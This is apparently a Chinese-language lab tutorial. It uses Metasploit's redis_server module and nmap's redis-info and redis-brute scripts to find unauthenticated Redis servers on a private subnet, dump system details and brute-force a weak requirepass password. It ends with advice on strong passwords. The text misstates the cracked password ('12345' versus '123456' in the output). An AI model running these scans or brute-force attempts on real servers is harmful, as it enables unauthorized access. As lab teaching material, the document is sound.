G.I.JOE

走过岁月......:

默认配置的redis是没有访问限制的，可以通过它获取大量系统信息。

1.msf批量探测redis服务器

msf > use auxiliary/scanner/misc/redis_server

msf auxiliary(redis_server) > set RHOSTS 192.168.73.0/24

RHOSTS => 192.168.73.0/24

msf auxiliary(redis_server) > set THREADS 10

THREADS => 10

msf auxiliary(redis_server) > run

[*] Scanning IP: 192.168.73.6

[*] Scanning IP: 192.168.73.4

[*] Scanning IP: 192.168.73.7

[*] Scanning IP: 192.168.73.3

[*] Scanning IP: 192.168.73.8

[*] Scanning IP: 192.168.73.9

[*] Scanning IP: 192.168.73.2

[*] Scanning IP: 192.168.73.1

......中略......

[*] Scanning IP: 192.168.73.130

[*] Redis Server Information $1908

# Server

redis_version:3.0.0

redis_git_sha1:00000000

redis_git_dirty:0

redis_build_id:715d8a91e5cdbe8e

redis_mode:standalone

os:Linux 2.6.32-131.0.15.el6.x86_64 x86_64

arch_bits:64

multiplexing_api:epoll

gcc_version:4.4.5

process_id:2582

run_id:4c0b8728104158f8090a2591525d3aa49acbbc94

tcp_port:6379

uptime_in_seconds:51800

uptime_in_days:0

hz:10

lru_clock:4811114

config_file:/etc/redis.conf

# Clients

connected_clients:1

client_longest_output_list:0

client_biggest_input_buf:0

blocked_clients:0

# Memory

used_memory:815944

used_memory_human:796.82K

used_memory_rss:7950336

used_memory_peak:815944

used_memory_peak_human:796.82K

used_memory_lua:35840

mem_fragmentation_ratio:9.74

mem_allocator:jemalloc-3.6.0

# Persistence

loading:0

rdb_changes_since_last_save:0

rdb_bgsave_in_progress:0

rdb_last_save_time:1430822674

rdb_last_bgsave_status:ok

rdb_last_bgsave_time_sec:-1

rdb_current_bgsave_time_sec:-1

aof_enabled:0

aof_rewrite_in_progress:0

aof_rewrite_scheduled:0

aof_last_rewrite_time_sec:-1

aof_current_rewrite_time_sec:-1

aof_last_bgrewrite_status:ok

aof_last_write_status:ok

# Stats

total_connections_received:1

total_commands_processed:1

instantaneous_ops_per_sec:0

total_net_input_bytes:12

total_net_output_bytes:7

instantaneous_input_kbps:0.00

instantaneous_output_kbps:0.00

rejected_connections:0

sync_full:0

sync_partial_ok:0

sync_partial_err:0

expired_keys:0

evicted_keys:0

keyspace_hits:0

keyspace_misses:0

pubsub_channels:0

pubsub_patterns:0

latest_fork_usec:0

migrate_cached_sockets:0

# Replication

role:master

connected_slaves:0

master_repl_offset:0

repl_backlog_active:0

repl_backlog_size:1048576

repl_backlog_first_byte_offset:0

repl_backlog_histlen:0

# CPU

used_cpu_sys:2.21

used_cpu_user:1.04

used_cpu_sys_children:0.00

used_cpu_user_children:0.00

# Cluster

cluster_enabled:0

# Keyspace

探测出192.168.73.130主机上安装有redis，且没有访问限制，于是进一步探测出系统信息，有利于后续的渗透操作。

2.换个姿势获取信息——nmap

root@kali:~# nmap -p 6379 192.168.73.130 --script redis-info.nse

Starting Nmap 6.47 ( https://nmap.org ) at 2015-05-05 21:30 EDT

Nmap scan report for 192.168.73.130

Host is up (0.00025s latency).

PORT     STATE SERVICE

6379/tcp open  unknown

| redis-info: 

|   Version            3.0.0

|   Operating System   Linux 2.6.32-131.0.15.el6.x86_64 x86_64

|   Architecture       64 bits

|   Process ID         9172

|   Used CPU (sys)     0.03

|   Used CPU (user)    0.00

|   Connected clients  1

|   Connected slaves   0

|   Used memory        796.82K

|_  Role               master

MAC Address: 00:0C:29:8C:1C:BB (VMware)

3.配置访问密码后再次探测——msf

在 redis.conf 中找到“requirepass”字段，在后面填上需要的密码，如

#

requirepass 123456

#

再次执行msf

msf auxiliary(redis_server) > run

[*] Scanning IP: 192.168.73.130

[-] 192.168.73.130 does not have a Redis server

[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

探测失败

4.配置访问密码后再次探测——nmap

root@kali:~# nmap -p 6379 192.168.73.130 --script redis-info.nse

Starting Nmap 6.47 ( https://nmap.org ) at 2015-05-05 21:33 EDT

Nmap scan report for 192.168.73.130

Host is up (0.00030s latency).

PORT     STATE SERVICE

6379/tcp open  unknown

| redis-info: 

|_  ERROR: Authentication required

MAC Address: 00:0C:29:8C:1C:BB (VMware)

探测失败

5.遇佛杀佛——nmap破解redis密码

root@kali:~# nmap -p 6379 192.168.73.130 --script redis-brute

Starting Nmap 6.47 ( https://nmap.org ) at 2015-05-05 22:13 EDT

Nmap scan report for 192.168.73.130

Host is up (0.00033s latency).

PORT     STATE SERVICE

6379/tcp open  unknown

| redis-brute: 

|   Accounts

|     123456 - Valid credentials

|   Statistics

|_    Performed 11 guesses in 1 seconds, average tps: 11

MAC Address: 00:0C:29:8C:1C:BB (VMware)

成功破解出密码：12345 

配置强密码，建议15位以上，但并不意味着可以阻止暴力破解，只是增加破解难度而已